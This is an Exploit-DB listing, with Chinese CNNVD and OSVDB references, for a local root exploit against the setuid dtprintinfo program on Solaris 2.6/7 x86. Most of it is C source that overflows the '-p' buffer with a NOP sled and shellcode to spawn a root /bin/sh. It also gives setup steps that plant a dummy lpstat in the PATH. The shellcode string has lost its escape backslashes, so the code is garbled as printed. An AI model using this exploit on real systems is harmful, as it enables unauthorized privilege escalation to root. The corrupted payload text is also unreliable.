https://www.exploit-db.com/exploits/19205
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199905-022

Solarisdtprintinfo程序中存在缓冲区溢出漏洞。

/*
source: http://www.securityfocus.com/bid/249/info

The dtprintinfo is a setuid commands open the CDE Print Manager window. A stack based buffer overflow in the handling of the "-p" option allow the execution of arbitrary code as root.

This vulnerablity has been assigned Sun Bug# 4139394. The vulnerability is in the CDE 1.2 and CDE 1.3 subsystem of Solaris 2.6 and Solaris 7 respectibly. 

Before executing the ex_dtprintinfo exploit set your DISPLAY environment variable correctly, and make a dummy lpstat command like:

% cat > lpstat
echo "system for lpprn: server.com"
^D
% chmod 755 lpstat
% setenv PATH .:$PATH
% gcc ex_dtprintinfo.c
% a.out 
*/

/*========================================================================
   ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition)
   The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
   Written by UNYUN ([email protected])
  ========================================================================
*/
static char             x[1000];
#define ADJUST          0
#define STARTADR        621
#define BUFSIZE         900
#define NOP             0x90
unsigned long ret_adr;
int     i;
char exploit_code[] =
"xebx18x5ex33xc0x33xdbxb3x08x2bxf3x88x06x50x50xb0"
"x8dx9axffxffxffxffx07xeexebx05xe8xe3xffxffxff"
"xebx18x5ex33xc0x33xdbxb3x08x2bxf3x88x06x50x50xb0"
"x17x9axffxffxffxffx07xeexebx05xe8xe3xffxffxff"
"x55x8bxecx83xecx08xebx50x33xc0xb0x3bxebx16xc3x33"
"xc0x40xebx10xc3x5ex33xdbx89x5ex01xc6x46x05x07x88"
"x7ex06xebx05xe8xecxffxffxffx9axffxffxffxffx0fx0f"
"xc3x5ex33xc0x89x76x08x88x46x07x89x46x0cx50x8dx46"
"x08x50x8bx46x08x50xe8xbdxffxffxffx83xc4x0cx6ax01"
"xe8xbaxffxffxffx83xc4x04xe8xd4xffxffxff/bin/sh";

unsigned long get_sp(void)
{
  __asm__(" movl %esp,%eax ");
}
main()
{
        putenv("LANG=");
        for (i=0;i<BUFSIZE;i++) x[i]=NOP;
        for (i=0;i<strlen(exploit_code);i++)
                x[STARTADR+i]=exploit_code[i];
        ret_adr=get_sp() - 1292 + 148;
        for (i = ADJUST; i < 400 ; i+=4){
                x[i+0]=ret_adr & 0xff;
                x[i+1]=(ret_adr >> 8 ) &0xff;
                x[i+2]=(ret_adr >> 16 ) &0xff;
                x[i+3]=(ret_adr >> 24 ) &0xff;
        }
        x[BUFSIZE]=0;
        execl("/usr/dt/bin/dtprintinfo", "dtprintinfo",
        "-p",x,(char *) 0);
}

来源:OSVDB
名称:6552
链接:http://www.osvdb.org/6552